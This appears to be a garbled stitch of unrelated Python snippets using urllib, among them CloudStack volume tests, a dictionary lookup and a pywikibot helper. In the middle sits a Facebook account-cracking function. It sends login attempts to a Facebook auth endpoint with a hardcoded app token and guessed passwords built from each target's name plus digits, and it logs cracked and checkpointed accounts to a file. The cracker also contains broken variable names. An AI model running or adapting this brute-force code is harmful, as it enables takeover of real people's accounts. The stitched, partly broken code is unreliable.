            print(colored(" http://www-tac.cisco.com/~yalv/development/Zenus/Zenus.EN.html", 'green'))
            print("OR")
            print(colored(" http://www-tac.cisco.com/~yalv/development/Zenus/Zenus.CN.html", 'green'))
            print("")
            note_raw = urlopen("http://www-tac.cisco.com/~yalv/development/Zenus/download/mac/note")
            notes = note_raw.read()
            print(colored(notes, 'green'))
            print(colored('=' * line_length, 'green'))
        else:
            pass
    except:
        pass
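# The lexical comparison above ('1.0.2.zip' > '1.0.1.zip') only works while every
# version component stays single-digit; '1.0.10.zip' would sort before '1.0.9.zip'.
# A minimal sketch of a numeric comparison, assuming the same 'X.Y.Z.zip' naming
# convention used by check_update():
def version_key(filename):
    # '1.0.1.zip' -> (1, 0, 1)
    return tuple(int(part) for part in filename[:-len('.zip')].split('.'))

# e.g. update_version = max(found_versions, key=version_key)
#      if version_key(update_version) > version_key(current_version): ...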
def searchWord(word):
    url = r'http://fanyi.youdao.com/openapi.do?keyfrom=<yourname>&key=<yourkey>&type=data&doctype=json&version=1.1&q=' + word
    f = urlopen(url)
    jsonStr = f.read()
    getData(jsonStr)
def get_page(url):
    try:
        import urllib
        return urllib.urlopen(url).read()
    except:
        return ""
def main(arg): global cekpoint, oks user = arg try: os.mkdir('out') except OSError: pass try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '786' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' 😋 ' + b[ 'name'] oks.append(user + pass1) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' 😋 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass1 + "\n") cek.close() cekpoint.append(user + pass1) else: pass2 = b['first_name'] + '123' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(dafa) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' 👽 ' + b[ 'name'] oks.append(user + pass2) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' 👽 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass2 + "\n") cek.close() cekpoint.append(user + pass2) else: pass3 = b['first_name'] + '12345' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(wifi) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' 👽 ' + b[ 'name'] oks.append(user + pass3) else: if 'www.facebook.com' in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' 👽 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass3 + "\n") cek.close() cekpoint.append(user + pass4) else: pass4 = b['first_name'] + '1234' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(wifi) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' 👽 ' + b[ 'name'] oks.append(user + pass4) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' 👽 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass4 + "\n") cek.close() cekpoint.append(user + pass4) else: pass5 = '786786' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = 
json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' 👽 ' + b[ 'name'] oks.append(user + pass5) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' 👽 ' + b[ 'name'] cek = open( "out/CP.txt", "a") cek.write(user + "|" + pass5 + "\n") cek.close() cekpoint.append(user + pass5) else: pass6 = b[ 'last_name'] + '123' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' 👽 ' + b[ 'name'] oks.append(user + pass6) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' 👽 ' + b[ 'name'] cek = open( "out/CP.txt", "a") cek.write(user + "|" + pass6 + "\n") cek.close() cekpoint.append( user + pass6) else: pass7 = 'Pakistan' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(wifi) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' 👽 ' + b[ 'name'] oks.append( user + pass7) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' 👽 ' + b[ 'name'] cek = open( "out/CP.txt", "a") cek.write( user + "|" + pass7 + "\n") cek.close() cekpoint.append( user + pass7) except: pass
def test_02_negative_path(self): """ negative test for volume life cycle # 1. Deploy a vm [vm1] with shared storage and data disk #v1. Create VM2 with local storage offering disk offerings # 2.TBD # 3. Detach the data disk from VM1 and Download the volume # 4.TBD # 5. Attach volume with deviceid = 0 # 6. Attach volume, specify a VM which is destroyed # 7.TBD # 8.TBD # 9.TBD # 10.TBD # 11.Upload the volume from T3 by providing the URL of the downloaded volume, but specify a wrong format (not supported by the hypervisor) # 12.Upload the same volume from T4 by providing a wrong URL # 13.Upload volume, provide wrong checksum # 14.Upload a volume when maximum limit for the account is reached # 15.TBD # 16.Upload volume with all correct parameters (covered in positive test path) # 17.TBD # 18.TBD # 19.Now attach the volume with all correct parameters (covered in positive test path) # 20.Destroy and expunge all VMs """ # 1. Deploy a vm [vm1] with shared storage and data disk self.virtual_machine_1 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, diskofferingid=self.disk_offering_1.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_1.id) # List data volume for vm1 list_volume = Volume.list(self.userapiclient, virtualmachineid=self.virtual_machine_1.id, type='DATADISK') self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for vm id %s" % self.virtual_machine_1.id) list_data_volume_for_vm1 = list_volume[0] self.assertEqual( len(list_volume), 1, "There is no data disk attached to vm id:%s" % self.virtual_machine_1.id) self.assertEqual(list_data_volume_for_vm1.virtualmachineid, str(self.virtual_machine_1.id), "Check if volume state (attached) is reflected") # Variance if self.zone.localstorageenabled: # V1.Create vm3 with local storage offering self.virtual_machine_local_2 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_2.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_local_2.id) # 3. Detach the data disk from VM1 and Download the volume self.virtual_machine_1.detach_volume(self.userapiclient, volume=list_data_volume_for_vm1) verify_detach_volume(self, self.virtual_machine_1.id, list_data_volume_for_vm1.id) # download detached volume self.extract_volume = Volume.extract( self.userapiclient, volume_id=list_data_volume_for_vm1.id, zoneid=self.zone.id, mode='HTTP_DOWNLOAD') self.debug("extracted url is%s :" % self.extract_volume.url) try: formatted_url = urllib.unquote_plus(self.extract_volume.url) self.debug("Attempting to download volume at url %s" % formatted_url) response = urllib.urlopen(formatted_url) self.debug("response from volume url %s" % response.getcode()) fd, path = tempfile.mkstemp() self.debug("Saving volume %s to path %s" % (list_data_volume_for_vm1.id, path)) os.close(fd) with open(path, 'wb') as fd: fd.write(response.read()) self.debug("Saved volume successfully") except Exception: self.fail( "Extract Volume Failed with invalid URL %s (vol id: %s)" % (self.extract_volume, list_data_volume_for_vm1.id)) # 6. 
Attach volume, specify a VM which is destroyed self.virtual_machine_2 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_2.id) try: self.virtual_machine_2.delete(self.apiclient) except Exception as e: raise Exception("Vm deletion failed with error %s" % e) # Create a new volume self.volume = Volume.create(self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_data_volume = Volume.list(self.userapiclient, id=self.volume.id) self.assertEqual( validateList(list_data_volume)[0], PASS, "Check List volume response for volume %s" % self.volume.id) self.assertEqual( list_data_volume[0].id, self.volume.id, "check list volume response for volume id: %s" % self.volume.id) self.debug("volume id %s got created successfully" % list_data_volume[0].id) # try Attach volume to vm2 try: self.virtual_machine_2.attach_volume(self.userapiclient, self.volume) self.fail("Volume got attached to a destroyed vm ") except Exception: self.debug("Volume cant not be attached to a destroyed vm ") # 11.Upload the volume by providing the URL of the downloaded # volume, but specify a wrong format (not supported by the hypervisor) if "OVA" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "VHD" else: self.testdata["configurableData"]["upload_volume"][ "format"] = "OVA" try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"]) self.fail("Volume got uploaded with invalid format") except Exception as e: self.debug("upload volume failed due %s" % e) # 12. 
Upload the same volume from T4 by providing a wrong URL self.testdata["configurableData"]["upload_volume"]["format"] = "VHD" if "OVA" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "OVA" if "QCOW2" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "QCOW2" u1 = self.extract_volume.url.split('.') u1[-2] = "wrong" wrong_url = ".".join(u1) try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=wrong_url, services=self.testdata["configurableData"]["upload_volume"]) self.upload_response.wait_for_upload(self.userapiclient) self.fail("volume got uploaded with wrong url") except Exception as e: self.debug("upload volume failed due to %s" % e) # 13.Upload volume, provide wrong checksum try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"], checksome="123456") self.upload_response.wait_for_upload(self.userapiclient) self.fail("volume got uploaded with wrong checksome") except Exception as e: self.debug("upload volume failed due to %s" % e) # 14.Upload a volume when maximum limit for the account is reached account_update = Resources.updateLimit(self.apiclient, resourcetype=2, account=self.account.name, domainid=self.account.domainid, max=1) list_resource = Resources.list(self.apiclient, account=self.account.name, domainid=self.account.domainid, resourcetype=2) self.assertEqual( validateList(list_resource)[0], PASS, "Check List resource response for volume %s" % self.account.name) self.assertEqual( str(list_resource[0].max), '1', "check list List resource response for account id: %s" % self.account.name) self.debug("Max resources got updated successfully for account %s" % self.account.name) try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"]) self.upload_response.wait_for_upload(self.userapiclient) self.fail("volume got uploaded after account reached max limit for\ volumes ") except Exception as e: self.debug("upload volume failed due to %s" % e)
def test_01_positive_path(self): """ positive test for volume life cycle # 1. Deploy a vm [vm1] with shared storage and data disk # 2. Deploy a vm [vm2]with shared storage without data disk # 3. TBD # 4. Create a new volume and attache to vm2 # 5. Detach data disk from vm1 and download it # Variance(1-9) # 6. Upload volume by providing url of downloaded volume in step 5 # 7. Attach the volume to a different vm - vm2 # 8. Try to delete an attached volume # 9. Create template from root volume of VM1 # 10. Create new VM using the template created in step 9 # 11. Delete the template # 12. Detach the disk from VM2 and re-attach the disk to VM1 # 13.TBD # 14.TBD # 15.Migrate volume(detached) and then attach to a vm and live-migrate # 16.Upload volume of size smaller than storage.max.volume.upload.size(leaving the negative case) # 17.TBD # 18.TBD # 19.TBD # 20.Detach data disks from VM2 and delete volume """ # 1. Deploy a vm [vm1] with shared storage and data disk self.virtual_machine_1 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, diskofferingid=self.disk_offering_1.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_1.id) # List data volume for vm1 list_volume = Volume.list(self.userapiclient, virtualmachineid=self.virtual_machine_1.id, type='DATADISK') self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for vm id %s" % self.virtual_machine_1.id) list_data_volume_for_vm1 = list_volume[0] self.assertEqual( len(list_volume), 1, "There is no data disk attached to vm id:%s" % self.virtual_machine_1.id) self.assertEqual(list_data_volume_for_vm1.virtualmachineid, str(self.virtual_machine_1.id), "Check if volume state (attached) is reflected") # 2. Deploy a vm [vm2]with shared storage without data disk self.virtual_machine_2 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_2.id) # 4. 
Create a new volume and attache to vm2 self.volume = Volume.create(self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_data_volume = Volume.list(self.userapiclient, id=self.volume.id) self.assertEqual( validateList(list_data_volume)[0], PASS, "Check List volume response for volume %s" % self.volume.id) self.assertEqual( list_data_volume[0].id, self.volume.id, "check list volume response for volume id: %s" % self.volume.id) self.debug("volume id %s got created successfully" % list_data_volume[0].id) # Attach volume to vm2 self.virtual_machine_2.attach_volume(self.userapiclient, self.volume) verify_attach_volume(self, self.virtual_machine_2.id, self.volume.id) # Variance if self.zone.localstorageenabled: # V1.Create vm3 with local storage offering self.virtual_machine_local_3 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_2.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_local_3.id) # V2.create two data disk on local storage self.local_volumes = [] for i in range(2): local_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_local.id, zoneid=self.zone.id) list_local_data_volume = Volume.list(self.userapiclient, id=local_volume.id) self.assertEqual( validateList(list_local_data_volume)[0], PASS, "Check List volume response for volume %s" % local_volume.id) self.assertEqual( list_local_data_volume[0].id, local_volume.id, "check list volume response for volume id: %s" % local_volume.id) self.debug("volume id %s got created successfully" % list_local_data_volume[0].id) self.local_volumes.append(local_volume) # V3.Attach local disk to vm1 self.virtual_machine_1.attach_volume(self.userapiclient, self.local_volumes[0]) verify_attach_volume(self, self.virtual_machine_1.id, self.local_volumes[0].id) if self.list_storage: # V4.create vm4 with zone wide storage self.virtual_machine_zone_4 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.tagged_so.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_zone_4.id) # V5.Create two data disk on zone wide storage self.zone_volumes = [] for i in range(2): zone_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_tagged.id, zoneid=self.zone.id) list_zone_data_volume = Volume.list(self.userapiclient, id=zone_volume.id) self.assertEqual( validateList(list_zone_data_volume)[0], PASS, "Check List volume response for volume %s" % zone_volume.id) self.assertEqual( list_zone_data_volume[0].id, zone_volume.id, "check list volume response for volume id: %s" % zone_volume.id) self.debug("volume id:%s got created successfully" % list_zone_data_volume[0].id) self.zone_volumes.append(zone_volume) # V6.Attach data disk running on ZWPS to VM1 (root disk on shared) self.virtual_machine_1.attach_volume(self.userapiclient, self.zone_volumes[0]) verify_attach_volume(self, self.virtual_machine_1.id, self.zone_volumes[0].id) # V7. 
Create a cluster wide volume and attach to vm running on zone # wide storage self.cluster_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_cluster_volume = Volume.list(self.userapiclient, id=self.cluster_volume.id) self.assertEqual( validateList(list_cluster_volume)[0], PASS, "Check List volume response for volume %s" % self.cluster_volume.id) self.assertEqual( list_cluster_volume[0].id, str(self.cluster_volume.id), "volume does not exist %s" % self.cluster_volume.id) self.debug("volume id %s got created successfuly" % list_cluster_volume[0].id) self.virtual_machine_zone_4.attach_volume(self.userapiclient, self.cluster_volume) verify_attach_volume(self, self.virtual_machine_zone_4.id, self.cluster_volume.id) if self.list_storage and self.zone.localstorageenabled: # V8.Attach zone wide volume to vm running on local storage self.virtual_machine_local_3.attach_volume(self.userapiclient, self.zone_volumes[1]) verify_attach_volume(self, self.virtual_machine_local_3.id, self.zone_volumes[1].id) # V9.Attach local volume to a vm running on zone wide storage self.virtual_machine_zone_4.attach_volume(self.userapiclient, self.local_volumes[1]) verify_attach_volume(self, self.virtual_machine_zone_4.id, self.local_volumes[1].id) # 5. Detach data disk from vm1 and download it self.virtual_machine_1.detach_volume(self.userapiclient, volume=list_data_volume_for_vm1) verify_detach_volume(self, self.virtual_machine_1.id, list_data_volume_for_vm1.id) # download detached volume self.extract_volume = Volume.extract( self.userapiclient, volume_id=list_data_volume_for_vm1.id, zoneid=self.zone.id, mode='HTTP_DOWNLOAD') self.debug("extracted url is%s :" % self.extract_volume.url) try: formatted_url = urllib.unquote_plus(self.extract_volume.url) self.debug("Attempting to download volume at url %s" % formatted_url) response = urllib.urlopen(formatted_url) self.debug("response from volume url %s" % response.getcode()) fd, path = tempfile.mkstemp() self.debug("Saving volume %s to path %s" % (list_data_volume_for_vm1.id, path)) os.close(fd) with open(path, 'wb') as fd: fd.write(response.read()) self.debug("Saved volume successfully") except Exception: self.fail( "Extract Volume Failed with invalid URL %s (vol id: %s)" % (self.extract_volume, list_data_volume_for_vm1.id)) # checking format of downloaded volume and assigning to # testdata["volume_upload"] if "OVA" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "OVA" if "QCOW2" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "QCOW2" # 6. Upload volume by providing url of downloaded volume in step 5 self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"]) self.upload_response.wait_for_upload(self.userapiclient) self.debug("uploaded volume id is %s" % self.upload_response.id) # 7. Attach the volume to a different vm - vm2 self.virtual_machine_2.attach_volume(self.userapiclient, volume=self.upload_response) verify_attach_volume(self, self.virtual_machine_2.id, self.upload_response.id) # 8. Try to delete an attached volume try: self.volume.delete(self.userapiclient) self.fail("Volume got deleted in attached state %s " % self.volume.id) except Exception as e: self.debug("Attached volume deletion failed because %s" % e) # 9. 
Create template from root volume of VM1(stop VM->create template # -> start vm) self.virtual_machine_1.stop(self.userapiclient) self.list_root_disk_for_vm1 = Volume.list( self.userapiclient, virtualmachineid=self.virtual_machine_1.id, type='ROOT') self.assertEqual( validateList(self.list_root_disk_for_vm1)[0], PASS, "Check List volume response for vm %s" % self.virtual_machine_1.id) self.assertEqual( len(self.list_root_disk_for_vm1), 1, "list root disk for vm1 is empty : %s" % self.virtual_machine_1.id) self.template_from_vm1_root_disk = Template.create( self.userapiclient, self.testdata["template"], self.list_root_disk_for_vm1[0].id, account=self.account.name, domainid=self.account.domainid) list_template = Template.list( self.userapiclient, templatefilter=self.testdata["templatefilter"], id=self.template_from_vm1_root_disk.id) self.assertEqual( validateList(list_template)[0], PASS, "Check List template response for template id %s" % self.template_from_vm1_root_disk.id) self.assertEqual( len(list_template), 1, "list template response is empty for template id : %s" % list_template[0].id) self.assertEqual(list_template[0].id, self.template_from_vm1_root_disk.id, "list template id is not same as created template") self.debug("Template id:%s got created successfully" % self.template_from_vm1_root_disk.id) self.virtual_machine_1.start(self.userapiclient) # 10. Deploy a vm using template ,created from vm1's root disk self.virtual_machine_3 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template_from_vm1_root_disk.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_3.id) # 11.delete the template created from root disk of vm1 try: self.template_from_vm1_root_disk.delete(self.userapiclient) self.debug("Template id: %s got deleted successfuly" % self.template_from_vm1_root_disk.id) except Exception as e: raise Exception("Template deletion failed with error %s" % e) list_template = Template.list( self.userapiclient, templatefilter=self.testdata["templatefilter"], id=self.template_from_vm1_root_disk.id) self.assertEqual( list_template, None, "Template is not deleted, id %s:" % self.template_from_vm1_root_disk.id) self.debug("Template id%s got deleted successfully" % self.template_from_vm1_root_disk.id) # List vm and check the state of vm verify_vm(self, self.virtual_machine_3.id) # 12.Detach the disk from VM2 and re-attach the disk to VM1 self.virtual_machine_2.detach_volume(self.userapiclient, volume=self.upload_response) verify_detach_volume(self, self.virtual_machine_2.id, self.upload_response.id) self.virtual_machine_1.attach_volume(self.userapiclient, volume=self.upload_response) verify_attach_volume(self, self.virtual_machine_1.id, self.upload_response.id) # 15.Migrate volume(detached) and then attach to a vm and live-migrate self.migrate_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_volume = Volume.list(self.apiclient, id=self.migrate_volume.id) self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for volume %s" % self.migrate_volume.id) self.assertEqual(list_volume[0].id, str(self.migrate_volume.id), "volume does not exist %s" % self.migrate_volume.id) self.debug("volume id %s got created successfuly" % list_volume[0].id) self.virtual_machine_1.attach_volume(self.userapiclient, 
self.migrate_volume) verify_attach_volume(self, self.virtual_machine_1.id, self.migrate_volume.id) self.virtual_machine_1.detach_volume(self.userapiclient, volume=self.migrate_volume) verify_detach_volume(self, self.virtual_machine_1.id, self.migrate_volume.id) list_volume = Volume.list(self.apiclient, id=self.migrate_volume.id) self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for volume %s" % self.migrate_volume.id) self.assertEqual(list_volume[0].id, str(self.migrate_volume.id), "volume does not exist %s" % self.migrate_volume.id) self.debug("volume id %s got created successfuly" % list_volume[0].id) list_pool = StoragePool.list(self.apiclient, id=list_volume[0].storageid) self.assertEqual( validateList(list_pool)[0], PASS, "Check List pool response for storage id %s" % list_volume[0].storageid) self.assertGreater( len(list_pool), 0, "Check the list list storagepoolresponse for vm id: %s" % list_volume[0].storageid) list_pools = StoragePool.list(self.apiclient, scope=list_pool[0].scope) self.assertEqual( validateList(list_pools)[0], PASS, "Check List pool response for scope %s" % list_pool[0].scope) self.assertGreater( len(list_pools), 0, "Check the list vm response for scope :%s" % list_volume[0].scope) storagepoolid = None for i in range(len(list_pools)): if list_volume[0].storageid != list_pools[i].id: storagepoolid = list_pools[i].id break else: self.debug("No pool available for volume migration ") if storagepoolid is not None: try: volume_migrate = Volume.migrate( self.apiclient, storageid=storagepoolid, volumeid=self.migrate_volume.id) except Exception as e: raise Exception("Volume migration failed with error %s" % e) self.virtual_machine_2.attach_volume(self.userapiclient, self.migrate_volume) verify_attach_volume(self, self.virtual_machine_2.id, self.migrate_volume.id) pool_for_migration = StoragePool.listForMigration( self.apiclient, id=self.migrate_volume.id) self.assertEqual( validateList(pool_for_migration)[0], PASS, "Check list pool For Migration response for volume %s" % self.migrate_volume.id) self.assertGreater( len(pool_for_migration), 0, "Check the listForMigration response for volume :%s" % self.migrate_volume.id) try: volume_migrate = Volume.migrate( self.apiclient, storageid=pool_for_migration[0].id, volumeid=self.migrate_volume.id, livemigrate=True) except Exception as e: raise Exception("Volume migration failed with error %s" % e) else: try: self.migrate_volume.delete(self.userapiclient) self.debug("volume id:%s got deleted successfully " % self.migrate_volume.id) except Exception as e: raise Exception("Volume deletion failed with error %s" % e) # 16.Upload volume of size smaller than # storage.max.volume.upload.size(leaving the negative case) self.testdata["configurableData"]["upload_volume"]["format"] = "VHD" volume_upload = Volume.upload( self.userapiclient, self.testdata["configurableData"]["upload_volume"], zoneid=self.zone.id) volume_upload.wait_for_upload(self.userapiclient) self.debug("volume id :%s got uploaded successfully is " % volume_upload.id) # 20.Detach data disk from vm 2 and delete the volume self.virtual_machine_2.detach_volume(self.userapiclient, volume=self.volume) verify_detach_volume(self, self.virtual_machine_2.id, self.volume.id) try: self.volume.delete(self.userapiclient) self.debug("volume id:%s got deleted successfully " % self.volume.id) except Exception as e: raise Exception("Volume deletion failed with error %s" % e)
import urllib

url = 'http://localhost/upload.php'
filename = '/tmp/abc'

# read the file body so its contents (not the file object's repr) are sent
f = open(filename, 'rb')
filebody = f.read()
f.close()

# data = {'name': 'file', 'upload_file': filebody}
data = {'upload_file': filebody}

# note: urlencode posts the body as an ordinary form field,
# not as a multipart/form-data file upload
web_site = urllib.urlopen(url, urllib.urlencode(data))
print web_site.read()
#!/usr/bin/python
import os

import nltk
from urllib import urlopen
from bs4 import BeautifulSoup
from stripogram import html2text
#import urllib.request

html_doc = """Some HTML code that you want to convert"""
soup = BeautifulSoup(html_doc)
print(soup.get_text())

os.system('exit')

url = "https://downloads.chef.io/chef-server/stable"
html = urlopen(url).read()
raw = nltk.clean_html(html)
#text = html2text(raw)
#print text
processText(url)
def getCommonshelperCats(imagepage):
    ''' Get category suggestions from CommonSense. Parse them and return a list of suggestions. '''
    commonshelperCats = []
    usage = []
    galleries = []

    global search_wikis
    global hint_wiki

    site = imagepage.site()
    lang = site.language()
    family = site.family.name
    if lang == u'commons' and family == u'commons':
        parameters = urllib.urlencode(
            {'i': imagepage.titleWithoutNamespace().encode('utf-8'),
             'r': 'on',
             'go-clean': 'Find+Categories',
             'p': search_wikis,
             'cl': hint_wiki})
    elif family == u'wikipedia':
        parameters = urllib.urlencode(
            {'i': imagepage.titleWithoutNamespace().encode('utf-8'),
             'r': 'on',
             'go-move': 'Find+Categories',
             'p': search_wikis,
             'cl': hint_wiki,
             'w': lang})
    else:
        # Can't handle other sites atm
        return ([], [], [])

    commonsenseRe = re.compile('^#COMMONSENSE(.*)#USAGE(\s)+\((?P<usagenum>(\d)+)\)\s(?P<usage>(.*))\s#KEYWORDS(\s)+\((?P<keywords>(\d)+)\)(.*)#CATEGORIES(\s)+\((?P<catnum>(\d)+)\)\s(?P<cats>(.*))\s#GALLERIES(\s)+\((?P<galnum>(\d)+)\)\s(?P<gals>(.*))\s(.*)#EOF$', re.MULTILINE + re.DOTALL)

    gotInfo = False
    matches = None
    maxtries = 10
    tries = 0
    while not gotInfo:
        try:
            if tries < maxtries:
                tries = tries + 1
                commonsHelperPage = urllib.urlopen(
                    "http://toolserver.org/~daniel/WikiSense/CommonSense.php?%s" % parameters)
                matches = commonsenseRe.search(
                    commonsHelperPage.read().decode('utf-8'))
                gotInfo = True
            else:
                break
        except IOError:
            pywikibot.output(u'Got an IOError, let\'s try again')
        except socket.timeout:
            pywikibot.output(u'Got a timeout, let\'s try again')

    if matches and gotInfo:
        if matches.group('usagenum') > 0:
            used = matches.group('usage').splitlines()
            for use in used:
                usage = usage + getUsage(use)
                #pywikibot.output(use)
        if matches.group('catnum') > 0:
            cats = matches.group('cats').splitlines()
            for cat in cats:
                commonshelperCats.append(cat.replace('_', ' '))
                pywikibot.output(u'category : ' + cat)
        if matches.group('galnum') > 0:
            gals = matches.group('gals').splitlines()
            for gal in gals:
                galleries.append(gal.replace('_', ' '))
                pywikibot.output(u'gallery : ' + gal)

